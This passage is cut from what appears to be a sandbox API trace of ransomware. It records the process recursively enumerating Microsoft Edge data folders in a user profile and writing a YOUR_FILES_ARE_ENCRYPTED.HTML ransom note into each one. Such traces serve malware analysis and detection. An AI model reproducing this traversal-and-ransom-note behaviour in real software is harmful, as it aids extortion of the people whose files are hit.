dwReserved1=0x3188570, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0116.275] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.275] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0116.275] GetProcessHeap () returned 0x600000 [0116.275] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\IECompatUaCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\iecompatuacache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.276] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.277] CloseHandle (hObject=0x31c) returned 1 [0116.277] GetProcessHeap () returned 0x600000 [0116.277] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.277] GetProcessHeap () returned 0x600000 [0116.277] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.278] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x473d6c9, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x473d6c9, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x473d6c9, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="PlayReady", cAlternateFileName="PLAYRE~1")) returned 1 [0116.278] StrStrIW (lpFirst="PlayReady", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.278] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\PlayReady") returned 113 [0116.278] GetProcessHeap () returned 0x600000 [0116.278] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.279] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\PlayReady" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\PlayReady") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\PlayReady" [0116.279] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\PlayReady", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\PlayReady\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\PlayReady\\*" [0116.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\PlayReady\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x473d6c9, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x473d6c9, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x473d6c9, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.280] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x473d6c9, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x473d6c9, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x473d6c9, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 1 [0116.280] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x473d6c9, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x473d6c9, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x473d6c9, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 0 [0116.280] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.280] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\PlayReady\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0116.280] GetProcessHeap () returned 0x600000 [0116.280] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\PlayReady\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\playready\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.281] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.281] CloseHandle (hObject=0x31c) returned 1 [0116.282] GetProcessHeap () returned 0x600000 [0116.282] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.282] GetProcessHeap () returned 0x600000 [0116.282] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.282] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x46a4cef, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x46a4cef, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x46a4cef, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="UrlBlock", cAlternateFileName="")) returned 1 [0116.282] StrStrIW (lpFirst="UrlBlock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.282] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\UrlBlock") returned 112 [0116.282] GetProcessHeap () returned 0x600000 [0116.282] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.283] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\UrlBlock" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\UrlBlock") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\UrlBlock" [0116.283] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\UrlBlock", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\UrlBlock\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\UrlBlock\\*" [0116.283] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\UrlBlock\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x46a4cef, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x46a4cef, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x46a4cef, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0116.283] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x46a4cef, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x46a4cef, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x46a4cef, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 1 [0116.284] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x46a4cef, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x46a4cef, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x46a4cef, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 0 [0116.284] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0116.284] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\UrlBlock\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0116.284] GetProcessHeap () returned 0x600000 [0116.284] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\UrlBlock\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\urlblock\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.285] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.286] CloseHandle (hObject=0x31c) returned 1 [0116.286] GetProcessHeap () returned 0x600000 [0116.286] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.286] GetProcessHeap () returned 0x600000 [0116.286] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.286] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x429ee5c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x429ee5c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x429ee5c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="User", cAlternateFileName="")) returned 1 [0116.286] StrStrIW (lpFirst="User", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.286] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User") returned 108 [0116.286] GetProcessHeap () returned 0x600000 [0116.286] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.286] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User" [0116.286] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\*" [0116.286] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x429ee5c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x429ee5c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x429ee5c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.286] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x429ee5c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x429ee5c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x429ee5c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 1 [0116.286] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x429ee5c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4cc0d69, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4cc0d69, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="Default", cAlternateFileName="")) returned 1 [0116.286] StrStrIW (lpFirst="Default", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.286] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default") returned 116 [0116.286] GetProcessHeap () returned 0x600000 [0116.286] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0116.288] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default" [0116.288] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\*" [0116.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x429ee5c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4cc0d69, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4cc0d69, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f910, dwReserved1=0x25000025, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0116.289] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x429ee5c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4cc0d69, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4cc0d69, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f910, dwReserved1=0x25000025, cFileName="..", cAlternateFileName="")) returned 1 [0116.289] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f910, dwReserved1=0x25000025, cFileName="DataStore", cAlternateFileName="DATAST~1")) returned 1 [0116.289] StrStrIW (lpFirst="DataStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.289] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore") returned 126 [0116.289] GetProcessHeap () returned 0x600000 [0116.289] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x680348 [0116.290] lstrcpyW (in: lpString1=0x680348, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore" [0116.290] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\*" [0116.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.290] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName="..", cAlternateFileName="")) returned 1 [0116.290] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName="Data", cAlternateFileName="")) returned 1 [0116.290] StrStrIW (lpFirst="Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.290] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data") returned 131 [0116.290] GetProcessHeap () returned 0x600000 [0116.290] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x690350 [0116.291] lstrcpyW (in: lpString1=0x690350, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data" [0116.291] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\*" [0116.291] FindFirstFileW (in: 